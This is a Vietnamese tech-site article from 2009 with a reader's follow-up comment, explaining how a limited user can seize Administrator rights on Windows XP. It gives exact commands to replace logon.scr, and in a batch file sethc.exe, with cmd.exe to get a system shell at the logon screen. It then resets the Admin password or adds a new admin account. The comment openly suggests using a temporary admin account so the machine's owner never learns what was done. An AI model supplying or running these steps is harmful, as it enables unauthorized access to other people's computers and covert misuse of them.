Hackmậtkhẩu Admin trongWindowsXP từ Userthường Cập nhật lúc 07h38' ngày 18/09/2009 Bản in Gửi cho bạn bè Phản hồi Xem thêm: hack, mật khẩu, admin, windowsxp Quản Trị Mạng - Bạn chỉ được truy cập vào máy tính với một quyền user thông thường và điều đó khiến bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài hướng dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mậtkhẩu của Admin mà không cần sử dụng tới một phần mềm thứ ba nào cả. Lưu ý: Cách này không áp dụng được cho ổ đĩa NTFS - Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác các câu lệnh sau: cd\ trở về thư mục gốc cd\windows\system32 vào thư mục system32 mkdir hackdir tạo thư mục hackdir copy logon.scr hackdir\logon.scr sao lưu file logon.scr vào thư mục hackdir copy cmd.exe hackdir\cmd.exe sao lưu file cmd.exe vào thư mục hackdir del logon.scr xóa file logon.scr gốc copy hackdir\cmd.exe logon.scr sao lưu file cmd.exe trong thư mục hackdir trở về system32 và đổi tên thành logon.scr exit đóng cửa sổ lệnh - Sau đó khởi động lại máy tính. Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mậtkhẩu của tài khoản Admin trên máy. Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra. Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau: Cách 1: Đổi mậtkhẩutài khoản Admin sẵn có Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau: net user <username> <new pass> thay mậtkhẩutài khoản quản trị bằng mậtkhẩu mới hoặc net user <username> xóa trắng mậtkhẩu của tài khoản này Ví dụ: net user Administrator 123 câu lệnh này đổi mậtkhẩutài khoản Administrator thành 123. Cách 2: Thêm một tài khoản mới với quyền AdminTại cửa sổ lệnh lần lượt gõ các lệnh sau: net user <username> <password> /add thêm một tài khoản với tên và mậtkhẩu tương ứng net localgroup Administrators <username> /add đưa tài khoản vừa tạo vào nhóm quản trị Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mậtkhẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất. Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ thống của bạn hoạt động trở lại như bình thường. Đối với cách tác giả trình bày ở trên, bạn Doan Khan Luong có thắc mắc tại sao một user có quyền limited lại có thể xóa được file trong thư mục System32 là một câu hỏi hay, Mình xin bổ sung thêm một cách nữa cũng có thể "hack" được password của bất kì một user nào đó hoặc chiếm toàn quyền trên bất kì một máy tính nào đó, C1 : Vào Start / Run / notepad @echo off cls cd %systemroot%/system32 ren sethc.exe sethc.exe.bk copy cmd.exe sethc.exe /y ---> bạn lưu file này với tên bất kì với phần mở rộng là : *.bat (ví dụ : hack.bat) ------------Quá trình test------------ + Tại màn hình logon bạn thử nhấn shift 05 lần, nếu sau khi nhấn bạn thấy xuất hiện cửa sổ command prompt là thành công, ***Lưu ý : Khi ta chưa đăng nhập bất kì user nào, thì tại màn hình logon ta cho xuất hiện được của sổ command prompt, máy tính hiểu ta đang "đứng" tạiuser có quyền admin + Tới đây, với quyền admin thì bạn có thể làm được mọi thứ trên máy tính rồi phải không ? 1. Reset user bất kì bằng lệnh : net user [tên user] * 2. "Nâng cấp" user đang có quyền limited lên quyền admin bằng lệnh :"net localgroup" Cú pháp : net localgroup [tên group] [tên user] /add ví dụ : net localgroup administrators teo /add 3.Tạo một user mới với quyền admin, đăng nhập user đó vào máy tính, làm những gì bạn muốn sau đó xóa hẳn user đó khỏi máy tính <------ cách này chủ nhân máy tính không hề biết bạn vào và làm những công việc gì trên máy tính đó, C2 : Bạn có thể sử dụng đĩa LHT từ version 9.7 trở lên, cách thực hiện như sau : + Bạn chỉnh máy tính boot từ CD-ROM + Đăng nhập vào :"mini windows xp" + Vào đường dẫn sau : C:\windows\System32\ + Tìm và đổi tên cmd.exe thành sethc.exe + Tại màn hình logon, bạn cũng thực hiện tương tự như cách 01 Chúc các bạn thành công!!! Nếu có thắc mắc, các bạn có thể liên hệ với tôi theo địa chỉ email : 1. huynhvietcuong83@yahoo.com 2. cuonghv@ispace.edu.vn . Hack mật khẩu Admin trong Windows XP từ User thường Cập nhật lúc 07h38' ngày 18/09/2009 Bản in Gửi cho bạn bè Phản hồi Xem thêm: hack, mật khẩu, admin, . pass> thay mật khẩu tài khoản quản trị bằng mật khẩu mới hoặc net user <username> xóa trắng mật khẩu của tài khoản này Ví dụ: net user Administrator